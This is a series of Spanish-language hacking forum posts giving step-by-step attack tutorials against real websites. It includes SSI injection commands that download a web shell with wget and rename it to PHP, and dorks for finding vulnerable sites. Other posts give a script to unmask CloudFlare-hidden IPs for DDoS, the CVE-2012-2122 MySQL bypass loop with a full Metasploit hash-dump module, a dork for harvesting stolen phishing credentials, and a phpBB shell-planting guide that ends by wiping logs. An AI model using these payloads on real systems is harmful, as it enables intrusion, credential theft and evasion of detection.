Nota: Tenemos que utilizar las etiquetas <pre> </ pre> cuando ejecutamos algun comando.

Ejemplo: <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

Entonces tomamos uno de los comandos y lo insertamos en los cuadros de búsqueda o campos de inicio de sesión.

Los campos de inicio de sesión en su mayoría son vulnerables.

Sitio Vulnerable, ejemplo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero que haremos es ejecutar el comando en los campos como mencione lineas arriba, entonces esto deberia de quedar asi:



& nos devolverá todos los archivos del directorio....



Ahora vemos que nuestro comando se ejecutado con éxito y que el sitio es vulnerable ....

Paso II - Subiendo la Shell:

Como ya sabemos que el sitio web es vulnerable, entonces ya estamos listos para crear una shell.

En primer lugar tenemos que tener la shell en un .TXT y la subimos a cualquier host o nuestro host propio, ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora tenemos que descargar la shell con el siguiente comando:

<!--#exec cmd="wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" -->

Ahora sólo pegamos en el campo y pulsamos Entrar o Intro.



Para ver si el archivo en .TXT se ha descargado, tenemos que ejecutar el comando que usamos antes para listar los directorios:

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

En este caso yo he colocado config1.txt ustedes pueden utilizar cualquier nombre



Entonces si vemos que se ha descargado correctamente, ahora solo debemos cambiar el nombre de .Txt  a .Php, utilizando el siguiente comando:

<!--#exec cmd="mv config1.txt config.php" -->

Ahora, tenemos que listar nuevamente todos los archivos y tratar de encontrar la shell, en este caso se mostrara como config.php



Ahora, como ya sabemos que la shell esta en formato php, solo nos faltaria entrar a dicho archivo desde el navegador:


& Voila tenemos nuestra shell....


Les dejare algunas dorks:
Código: text
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Espero que hayas aprendido algo...

Saludos.
#32

¿Alguna vez te topastes con un sitio web protegido por CloudFlare? ¿No suspistes como obtener la IP real del sitio web?  Pues en esta entrada te enseñare como obtener la IP real de un sitio web protegido por CloudFlare, sera simple y rapido.

¿Que es CloudFlare?

CloudFlare protege y acelera cualquier sitio web en línea. Una vez que su sitio web es una parte de la comunidad CloudFlare, su tráfico de Internet pasa a través de nuestra red global inteligente. De manera automática, optimizar la entrega de sus páginas web para que los visitantes obtener el mejor tiempo de carga de página y el mejor rendimiento. También bloquean las amenazas y limitar los robots rastreadores abusivo y de perder su ancho de banda y recursos del servidor. El resultado: powered CloudFlare sitios web de ver una mejora significativa en el rendimiento y una disminución en los ataques de spam y otros

Cuando un sitio web esta protegido por CloudFlare, esta "esconde" la IP real del mismo, entonces esto evita que el sitio pueda ser denunciado u objeto de un ataque DDOS, entonces cuando un atacante quiera realizar dicho ataque, lo primera que hara sera hacer un PING, entonces el sitio le arrojara una IP falsa, la cual el atacante enviara el DDOS a dicha ip y el sitio no caera porque no esta atacando a la IP real.

¿Como se que un sitio esta protegido por CloudFlare?

Es muy facil, yo tomare un sitio protegido por CloudFlare y hare lo que hace un atacante, lo primero que hago es hacer PING  a una web cualquiera:

Ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Entonces cojo mi consola y hago ping No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la cual nos arroja una ip:


Como ven la ip que nos arroja es 108.162.197.178 entonces copiamos dicha IP y la pegamos en nuestro navegador para comprobar si es la IP de dicha web.

& oh!! Sorpresa... la ip nos arroja DNS ERROR:


Como ven, ahí comprobamos que el sitio web esta protegido por CloudFlare, entonces la pregunta del millon...

¿Como obtengo la IP real de un sitio protegido por CloudFlare?

Actualmente existen muchas formas de obtener la IP real, pero algunas no son efectivas, otras no funcionan y otras nos hacen perder el tiempo.

En este caso, les dejare un pequeño script en PHP, la cual realiza la funciona de buscar la IP real de cualquier sitio web protegido por CloudFlare.

Script:
Código: text
<?php

/*
* getCF.php
* I got tired of looking up the DNS records of these various hosts
* to find the real IP of a CloudFlare protected Server.
* www.bigkesh.com
* orgy[at]bigkesh[dot]com
* Usage: php getCF.php domain.com
* Usage2: www.yoursite.com/getCF.php?find=domain.com
*/

if (!isset($argv[1]) && !isset($_GET['find']))
{
    die("Argument needs to be a valid hostname.\n");
}

$lookupArr = array("mail.", "direct.", "direct-connect.", "cpanel.", "ftp.");

foreach ($lookupArr as $lookupKey)
{

    if (isset($_GET['find']))
    {
        $newline = "<br />";
        $lookupHost = $lookupKey . $_GET['find'];
    }
    else
    {
        $newline = "\n";
        $lookupHost = $lookupKey . $argv[1];
    }

    $foundHost = gethostbyname($lookupHost);

    if ($foundHost == $lookupHost)
    {
        echo "{$lookupHost} had no DNS record.{$newline}";
    }
    else
    {
        echo "{$lookupHost} = {$foundHost}{$newline}";
    }
}

?>


Copiamos todo el código y lo guardamos con el nombre que ustedes quieran... la subimos a un hosting cualquiera, puede ser gratis o de paga.

Veamos como funciona:

Yo he guardado el código con el nombre cloud.php entonces la he subido a mi hosting y hago la consulta desde el navegador.

Ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La cual la web nos devolverá el resultado:


La ip que nos arrojo es: 170.210.156.90 entonces quiere decir que esa es la IP real del sitio web, con lo que ya podemos proceder a realizar cualquier cosa con dicha IP.

Recuerden colocar el find= después del código para cada consulta y solo colocar la web directa, mas no  http ni www

Pueden utilizar el script desde mi hosting: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta?

Espero les sirva.

Saludos.
#33

Se ha encontrado un Grave bug en MySQL & MariaDB que permite a un atacante evadir la autenticación de la base de datos.

La vulnerabilidad (CVE-2012-2122) afecta a las siguientes versiones:

- MariaDB y MySQL hasta la 5.1.61, 5.2.11, 5.3.5 y 5.5.22

NO SON vulnerables las versiones:

- MySQL 5.1.63, 5.5.24 y 5.6.6
- MariaDB 5.1.62, 5.2.12, 5.3.6 y 5.5.23

El "exploit" de este bug es simplemente realizar conexiones simultáneas, con cualquier password introducida como parámetro y contra un servidor vulnerable, obteniendo así máximos privilegios (root).

Simplemente con esta linea en bash obtendremos acceso al servidor MySQL:
Código: text
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done


Para los amantes de MSF, ya existe un módulo (mysql_authbypass_hashdump) que explota este bug para dumpear toda la base de datos:
Código: text
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::MYSQL
include Msf::Auxiliary::Report

include Msf::Auxiliary::Scanner

def initialize
super(
'Name' => 'MYSQL CVE-2012-2122 Authentication Bypass Password Dump',
'Version' => '$Revision$',
'Description' => %Q{
This module exploits a password bypass vulnerability in MySQL in order
to extract the usernames and encrypted password hashes from a MySQL server.
These hashes ares stored as loot for later cracking.
},
'Authors' => [
'TheLightCosine <thelightcosine[at]metasploit.com>', # Original hashdump module
'jcran' # Authentication bypass bruteforce implementation
],
'References' => [
['CVE', '2012-2122'],
['OSVDB', '82804']
],
'DisclosureDate' => 'Jun 09 2012',
'License' => MSF_LICENSE
)

deregister_options('PASSWORD')
end


def run_host(ip)

# Keep track of results (successful connections)
results = []

# Username and password placeholders
username = datastore['USERNAME']
password = Rex::Text.rand_text_alpha(rand(8)+1)

# Do an initial check to see if we can log into the server at all
begin
socket = connect(false)
x = ::RbMysql.connect({
:host => rhost,
:port => rport,
:user => username,
:password => password,
:read_timeout => 300,
:write_timeout => 300,
:socket => socket
})
x.connect
results << x

print_good "#{rhost}:#{rport} The server accepted our first login as #{username} with a bad password"

rescue RbMysql::HostNotPrivileged
print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"
return
rescue RbMysql::AccessDeniedError
print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error "#{rhost}:#{rport} Error: #{e}"
return
end

# Short circuit if we already won
if results.length > 0
@mysql_handle = results.first
return dump_hashes
end


#
# Threaded login checker
#
max_threads = 16
cur_threads = []

# Try up to 1000 times just to be sure
queue = [*(1 .. 1000)]

while(queue.length > 0)
while(cur_threads.length < max_threads)

# We can stop if we get a valid login
break if results.length > 0

# keep track of how many attempts we've made
item = queue.shift

# We can stop if we reach 1000 tries
break if not item


# Status indicator
print_status "#{rhost}:#{rport} Authentication bypass is #{item/10}% complete" if (item % 100) == 0

t = Thread.new(item) do |count|
begin
# Create our socket and make the connection
s = connect(false)
x = ::RbMysql.connect({
:host => rhost,
:port => rport,
:user => username,
:password => password,
:read_timeout => 300,
:write_timeout => 300,
:socket => s,
:db => nil
})
print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts"
results << x
rescue RbMysql::AccessDeniedError
rescue Exception => e
print_status "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"
end
end

cur_threads << t

end

# We can stop if we get a valid login
break if results.length > 0

# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
if not t.alive?
cur_threads[ti] = nil
end
end

# Remove any dead threads from the set
cur_threads.delete(nil)

::IO.select(nil, nil, nil, 0.25)
end

# Clean up any remaining threads
cur_threads.each {|x| x.kill }


if results.length > 0
print_good("#{rhost}:#{rport} Successful exploited the authentication bypass flaw, dumping hashes...")
@mysql_handle = results.first
return dump_hashes
end

print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
end

def dump_hashes

# Grabs the username and password hashes and stores them as loot
res = mysql_query("SELECT user,password from mysql.user")
if res.nil?
print_error("#{rhost}:#{rport} There was an error reading the MySQL User Table")
return

end

# Create a table to store data
tbl = Rex::Ui::Text::Table.new(
'Header' => 'MysQL Server Hashes',
'Indent' => 1,
'Columns' => ['Username', 'Hash']
)

if res.size > 0
res.each do |row|
next unless (row[0].to_s + row[1].to_s).length > 0
tbl << [row[0], row[1]]
print_good("#{rhost}:#{rport} Saving HashString as Loot: #{row[0]}:#{row[1]}")
end
end

this_service = nil
if framework.db and framework.db.active
this_service = report_service(
:host => rhost,
:port => rport,
:name => 'mysql',
:proto => 'tcp'
)
end

report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?

end

# Stores the Hash Table as Loot for Later Cracking
def report_hashes(hash_loot,service)
filename= "#{rhost}-#{rport}_mysqlhashes.txt"
path = store_loot("mysql.hashes", "text/plain", rhost, hash_loot, filename, "MySQL Hashes", service)
print_status("#{rhost}:#{rport} Hash Table has been saved: #{path}")

end

end


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34

Gamja encontrará XSS (Cross Site Scripting) y el punto de inyección SQL, también parámetro de dirección URL de Error de Validación. ¿Quién sabe que el parámetro es un parámetro débil? Gamja será útil para encontrar la vulnerabilidad [XSS, Error de Validación & SQL Injection].

Podemos utilizar esta herramienta para analizar sitios pequeños o grandes, solo esperar el tiempo que toma la herramienta para analizar los sitios webs.

Requerimientos: wget , Perl

Breve Demostracion:


Informacion & Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos...
#35
Hola,

Bueno les dejo esta Dork, la cual busca todos los LOGS de Pishing; pueden encontrar correos & facebook con sus respectivas contraseñas.

Dork:
Código: text
filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="


Ejemplo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Úsenlo con prudencia.

Saludos...
#36
Hacking / Plecost: WordPress Pentest
Junio 05, 2012, 09:09:27 PM

Plecost recupera la información contenida en el sitio Web que se desea analizar, y además permite realizar una busqueda sobre los resultados indexados por Google. Basa su análisis en la información contenida en los ficheros de desarrollo incluidos por WordPress y sus plugins. El listado de plugins se genera en base al listado "Most populars" de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, unido con las entradas relacionadas con WordPress en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Plecost esta disponible en Backtrack5, R1 & R2: Aplicaciones - Backtrack - Vulnerability Assessment - Web Aplication Assessment - CMS Vulnerability - Identification - Plecost

Plecost es capaz de trabajar en dos modos. Por un lado analizando una única URL y por otro analizando los resultados de las búsquedas de Google. Analizaremos ahora las opciones más importantes.

- Google search mode
Recupera la información contenida en los resultados de Google en base al listado de plugin que se le entrega  como entrada de datos.
- Reload plugin list
Genera una lista de plugins a partir del listado "Most popular" de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
- URL mode
Analiza la información para una sola URL indicada como parámetro.

Uso para la versión No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:
Código: text
Usage: plecost-0.2.2-9-beta.py [options] [ URL | [-l num] -G]


Google search options:
    -l num    : Limit number of results for each plugin in google.
    -G        : Google search mode
   
Options:
    -n        : Number of plugins to use (Default all - more than 7000).
    -c        : Check plugins only with CVE associated.
    -R file   : Reload plugin list. Use -n option to control the size (This take several minutes)
    -o file   : Output file. (Default "output.txt")
    -i file   : Input plugin list. (Need to start the program)
    -s time   : Min sleep time between two probes. Time in seconds. (Default 10)
    -M time   : Max sleep time between two probes. Time in seconds. (Default 20)
    -t num    : Number of threads. (Default 1)
    -h        : Display help. (More info: http://iniqua.com/labs/)

Examples:

  * Reload first 5 plugins list:
    plecost -R plugins.txt -n 5
  * Search vulnerable sites for first 5 plugins:
        plecost -n 5 -G -i plugins.txt
  * Search plugins with 20 threads, sleep time between 12 and 30 seconds for www.example.com:
        plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example.com

Ejemplo:

Informacion del Proyecto:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos...
#37

WiPhire es un script en bash  para hacer que el proceso de hacking inalámbrico sea mucho más fácil.

Programas Incluidos:

- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- airdrop-ng (Requires directory /pentest/wireless/airdrop-ng/)
- xterm
- crunch (Requires directory /pentest/passwords/crunch)
- pyrit
- sslstrip
- arpspoof
- macchanger
- kate
- apache2 (Requires directory /etc/init.d/apache2)
- ettercap
- firefox (Trivial)


Descargar:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#38

Fimap es una pequeña herramienta programada en python que puede encontrar, preparar, auditar & explotar automaticamente los errores de Remote File Inclusion en aplicaciones web. Fimap debe ser algo como sqlmap sólo para LFI/RFI en lugar de la inyección de SQL. Es actualmente bajo desarrollo, pero es utilizable. El objetivo de Fimap es mejorar la calidad y la seguridad de su sitio web.

Ubicacion (Backtrack 5r2):
Aplicaciones - Backtrack - Exploitation Tools - Web Exploitation Tools - Fimap

Abriendo desde la consola:
Código: text
root@TioSam:~# cd /pentest/web/fimap
root@TioSam:/pentest/web/fimap# ls
baseClass.py   baseTools.pyc     config      crawler.py   fimap.py        language.py   massScan.pyc         plugins    report.pyc      targetScanner.py
baseClass.pyc  codeinjector.py   config.py   crawler.pyc  googleScan.py   language.pyc  plugininterface.py   README     singleScan.py   targetScanner.pyc
baseTools.py   codeinjector.pyc  config.pyc  doc          googleScan.pyc  massScan.py   plugininterface.pyc  report.py  singleScan.pyc  xgoogle
root@TioSam:/pentest/web/fimap# python fimap.py
fimap v.08.1 by Iman Karim - Automatic LFI/RFI scanner and exploiter
Use -h for some help.
root@TioSam:/pentest/web/fimap#


Breve Demostracion de la Herramienta:


Informacion & Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos... :)
#39

Grendel-Scan es una aplicación de código abierto de pruebas de seguridad web. Cuenta con módulo de pruebas automatizadas para la detección de vulnerabilidades comunes en aplicaciones Web, y las características orientadas a ayudar a la penetración de las pruebas manuales.

Backtrack 5 tiene contiene diferentes aplicaciones web de escáner de seguridad, así como que contienen Grendel-Scan también, sin embargo se puede utilizar e instalarlo en otras distribuciones de Linux y el sistema operativo Windows.

Ubicacion:
Aplicaciones - Backtrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanner -Grendel-Scan

Estas son algunas de las funciones que realiza Grendel Scan:

- Internal intercepting / testing proxy
- HTTP request fuzzer
- Manual requests
- Automatic file-not-found profiles
- Upstream proxy support
- HTTP request & connection throttling
- HTML form-based authentication; multiple user accounts
- Granular scan settings
- Blocked query parameters
- URL white-lists & blacklists
- Known session ID names

Además de todo esto, se ha construido en módulos para lo siguiente:

- SQL injection
- Error-based checks
- SQL tautologies – experimental
- Miscellaneous tests
- CRLF injection
- Cross-site request forgery (CSRF) tests
- Directory traversal tests
- Generic fuzzing
- Information Leakage
- Platform error messages
- Robots.txt testing
- Comment lister
- Web server configuration
- Cross-site tracing (XST)
- Proxy detection
- Application architecture
- Input / output flows
- Offline website mirror

Interfaz de la herramienta:


Plugins:


Uso & explicacion de la herramienta:


Saludos & hasta la proxima...  ;)
#40
Bugs y Exploits / Upload Shell PHBB Forum
Junio 01, 2012, 09:39:25 PM

Hola, hoy explicare como subir una shell en Foros PHBB.

Entramos al link del panel admin: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una vez que tengamos acceso de administrador, vamos hasta el final del foro:

Como podemos ver, si la cuenta tiene acceso de administrador, podemos ver el enlace del panel de administración

Si logramos ingresar como administrador del foro podemos apreciar el panel:


En la ficha configuración, vamos hacia abajo para la configuración de seguridad:


Ahora vamos hacia abajo para permitir el PHP en las plantillas, aseguremos de que esta opción este activada en YES.

Ahora vamos a la pestaña de estilos, en Componentes de Estilo, hacemos clic en Plantillas:


Nos mostrara las plantillas instaladas, hacemos clic en editar en la parte superior:


Ahora, bajo la plantilla seleccionada, seleccionams faq_body.html:


Imagen de la edicion de faq_body.html

Copiamos todo el texto & lo guardamos en archivo .txt

Ahora, borramos todo & pegamos este codigo:
Código: text
<!-- PHP -->

phpinfo();

<!-- ENDPHP -->



Clickeamos en Submit:


Ahora nos dirigimos a la pagina FAQ:
Código: text
http://www.site.com/faq.php



Ahora sabemos que podemos ejecutar comandos remotos & generar nuestra shell.

Regresamos a donde hemos editado el archivo, y reemplazar phpinfo (); con nuestro codigo de la shell.


Ahora nos dirigimos otra vez a la pagina FAQ & nuestra shell estara ahi  :)


Ahora borramos todos los logs para no dejar rastros:


Ahora podemos ir a la shell & hacer lo que querramos  :yija:

Gracias a Zer0Lulz por la idea...

Saludos....